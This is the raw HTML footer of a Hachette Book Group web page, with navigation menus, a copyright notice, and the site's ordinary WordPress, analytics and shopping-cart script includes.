			<ul id="menu-about" class="menu"><li id="menu-item-647353" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-647353"><a href="/landing-page/about-hachette-book-group-2/">About Us</a></li>
<li id="menu-item-478324" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478324"><a href="https://www.hachettebookgroup.com/leadership/">Our Leadership</a></li>
<li id="menu-item-478335" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478335"><a href="https://www.hachettebookgroup.com/imprints/">Imprints</a></li>
<li id="menu-item-550778" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-550778"><a href="https://www.hachettebookgroup.com/newsletters/">Newsletter Subscription</a></li>
<li id="menu-item-1192194" class="menu-item menu-item-type-post_type menu-item-object-landing-page menu-item-1192194"><a href="https://www.hachettebookgroup.com/landing-page/freedom-of-expression/">Freedom of Expression</a></li>
<li id="menu-item-1204864" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1204864"><a href="/landing-page/social-impact-at-hbg/">Social Impact at HBG</a></li>
<li id="menu-item-478329" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478329"><a href="https://www.hachettebookgroup.com/about/hbg-in-the-news/">HBG In the News</a></li>
<li id="menu-item-478328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478328"><a href="https://www.hachettebookgroup.com/press-publicity/">Press &amp; Publicity</a></li>
</ul>		</div>
	</li>
</ul>

<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-resources" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-resources">
			Resources			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-resources">
			<ul id="menu-resources" class="menu"><li id="menu-item-230735" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230735"><a target="_blank" rel="noopener" href="https://authorportal.hbgusa.com">Authors &#038; Agents</a></li>
<li id="menu-item-230733" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230733"><a target="_blank" rel="noopener" href="https://www.hachettebookgroup.com/landing-page/hbg-booksellers/">Booksellers</a></li>
<li id="menu-item-230734" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230734"><a target="_blank" rel="noopener" href="https://www.hachettebookgroup.com/landing-page/client-services/">Client Services</a></li>
<li id="menu-item-230736" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-230736"><a target="_blank" rel="noopener" href="https://www.hbgresources.com/">Librarians &#038; Educators</a></li>
<li id="menu-item-665775" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-665775"><a href="https://www.hachettebookgroup.com/landing-page/ordersupport">eCommerce Order Support</a></li>
<li id="menu-item-913357" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-913357"><a href="https://www.hachetteacademic.com/">Hachette Academic</a></li>
<li id="menu-item-512066" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-512066"><a href="https://www.hachettebookgroup.com/about/careers/">Careers</a></li>
<li id="menu-item-478333" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-478333"><a href="https://www.hachettebookgroup.com/landing-page/contact-us-2">Contact HBG</a></li>
<li id="menu-item-478352" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-478352"><a href="https://www.hachettebookgroup.com/about/faqs/">FAQ</a></li>
</ul>		</div>
	</li>
</ul>

<ul class="site-footer__menu">
	<li class="site-footer__menu-item-has-children" >
		<span class="site-footer__menu-text toggleable" data-toggle-target="site-footer__sub-menu-terms-and-policies" data-toggle-block="site-footer__sub-menu" data-toggle-element="site-footer__sub-menu-terms-and-policies">
			Terms and Policies			<span class="site-footer__menu-expand sub-menu-expand">
				<span class="site-footer__plus">+</span>
				<span class="site-footer__minus">-</span>
			</span>
		</span>
		<div class="sub-menu" data-toggle-element="site-footer__sub-menu-terms-and-policies">
			<ul id="menu-terms-and-policies" class="menu"><li id="menu-item-230741" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230741"><a href="https://www.hachettebookgroup.com/terms-and-policies/terms-of-use/">Terms of Use</a></li>
<li id="menu-item-230740" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-privacy-policy menu-item-230740"><a href="https://www.hachettebookgroup.com/terms-and-policies/privacy-policy/">Privacy Policy</a></li>
<li id="menu-item-927110" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-927110"><a target="_blank" rel="noopener" href="https://hbgusa.zendesk.com/hc/en-us/articles/360047685472-HBG-CCPA-Privacy-Rights-Tool">Do Not Sell My Personal Information</a></li>
<li id="menu-item-362560" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-362560"><a href="https://www.hachettebookgroup.com/terms-and-policies/report-piracy/">Report Piracy</a></li>
<li id="menu-item-230738" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230738"><a href="https://www.hachettebookgroup.com/terms-and-policies/cpsia/">CPSIA</a></li>
</ul>		</div>
	</li>
</ul>
	</nav>
	<div class="site-footer__copyright">
		© 2022 Hachette Book Group		<br>
		Portions of data on HachetteBookGroup.com are supplied by Books In Print &reg;. Copyright 2022 ProQuest LLC. All rights reserved. All rights in images of books or other publications are reserved by the original copyright owners.	</div>
</footer>
			</div><!-- #content -->
		</div><!-- #page -->
		<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-content/mu-plugins/jetpack-11.3/_inc/build/photon/photon.min.js?ver=20191001' id='jetpack-photon-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-content/plugins/hachette-plugin/build/campaignViewFrontEnd.bundle.min.js?ver=b5f2dcfe208c81eb098b' id='hachette-plugin-campaign-view-frontend-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/jquery/ui/core.min.js?ver=1.13.1' id='jquery-ui-core-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/jquery/ui/menu.min.js?ver=1.13.1' id='jquery-ui-menu-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9' id='regenerator-runtime-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0' id='wp-polyfill-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/dist/dom-ready.min.js?ver=d996b53411d1533a84951212ab6ac4ff' id='wp-dom-ready-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/dist/hooks.min.js?ver=c6d64f2cb8f5c6bb49caca37f8828ce3' id='wp-hooks-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/dist/i18n.min.js?ver=ebee46757c6a411e38fd079a7ac71d94' id='wp-i18n-js'></script>
<script type='text/javascript' id='wp-i18n-js-after'>
wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
</script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/dist/a11y.min.js?ver=a38319d7ba46c6e60f7f9d4c371222c5' id='wp-a11y-js'></script>
<script type='text/javascript' id='jquery-ui-autocomplete-js-extra'>
/* <![CDATA[ */
var uiAutocompleteL10n = {"noResults":"No results found.","oneResult":"1 result found. Use up and down arrow keys to navigate.","manyResults":"%d results found. Use up and down arrow keys to navigate.","itemSelected":"Item selected."};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/jquery/ui/autocomplete.min.js?ver=1.13.1' id='jquery-ui-autocomplete-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-content/themes/hachette/static/js/common.bundle.min.js?ver=56abd56c9fcae44ccf28' id='hachette-common-js-js'></script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-includes/js/hoverIntent.min.js?ver=1.10.2' id='hoverIntent-js'></script>
<script type='text/javascript' id='hachette-site-js-js-extra'>
/* <![CDATA[ */
var newsletter = {"ajax_url":"https:\/\/www.hachettebookgroup.com\/wp-admin\/admin-ajax.php","nonce":"2759f9cafb","duplicate":"Success! You're signed up.","success":"Success! You're signed up.","invalid":"Hm, try another email?","error":"We're sorry, there was an error."};
var mailchimpPopup = {"ajax_url":"https:\/\/www.hachettebookgroup.com\/wp-admin\/admin-ajax.php","nonce":"506ad1aed4","success":"Your preferences have been successfully saved.","error":"We're sorry, there was an error."};
var whatsInside = {"ajaxUrl":"\/wp-admin\/admin-ajax.php?action=zola_preview&zola-auth=d4ce61a8fb"};
var lazyTitles = {"ajaxUrl":"\/wp-admin\/admin-ajax.php?action=lazy_title&load-title-auth=2fe08b4756"};
var icons = {"contributor":"https:\/\/www.hachettebookgroup.com\/wp-content\/themes\/hachette\/static\/images\/icons\/contributor.png","hbg-title":"https:\/\/www.hachettebookgroup.com\/wp-content\/themes\/hachette\/static\/images\/icons\/hbg-title.png"};
var geoCountryCode = "US";
var euroUser = "false";
var gdprForAll = "false";
var analytics = {"environAuth":"EVafa-1EU0ArWEPW1vxdeQ","environPreview":"env-24","dataLayer":"dataLayer","containerKey":"GTM-5LRFFXK"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-content/themes/hachette/static/js/hachette-site.bundle.min.js?ver=56abd56c9fcae44ccf28' id='hachette-site-js-js'></script>
<script type='text/javascript' id='hbg-all-domains-js-js-extra'>
/* <![CDATA[ */
var checkExam = {"ajaxUrl":"https:\/\/www.hachettebookgroup.com\/wp-admin\/admin-ajax.php","nonce":"fd8b8fd299","isbns":["8 Books for World Mental Health Day"],"button":".zb-btn","link":"exam-copy-link","zola_url":"https:\/\/examcopyrequestform.poweredbyzola.com\/?isbn="};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-content/themes/hachette-book-group/client/build/js/lens-hbg-all-domains.bundle.js?ver=94083c39b99d9c48b82e' id='hbg-all-domains-js-js'></script>
<script type='text/javascript' id='vue_cart-js-extra'>
/* <![CDATA[ */
var source = {"env":"production","cartMessage":"<p>Shipping and taxes calculated at checkout. You may experience shipping delays. Please see\u00a0<a href=\"https:\/\/www.hachettebookgroup.com\/about\/faqs\/\">FAQ<\/a>.<\/p>\n"};
/* ]]> */
</script>
<script type='text/javascript' src='https://www.hachettebookgroup.com/wp-content/themes/hachette-book-group/client/build/images/static/js/cart.js?ver=0.1' id='vue_cart-js'></script>
<script type='text/javascript' src='https://platform.twitter.com/widgets.js?ver=1.0' id='hbg-twitter-widget-js'></script>
<script src='https://stats.wp.com/e-202240.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:11.3.2',blog:'155679224',post:'1269467',tz:'-4',srv:'www.hachettebookgroup.com',hp:'vip'} ]);
	_stq.push([ 'clickTrackerInit', '155679224', '1269467' ]);
</script>
	</body>
</html>

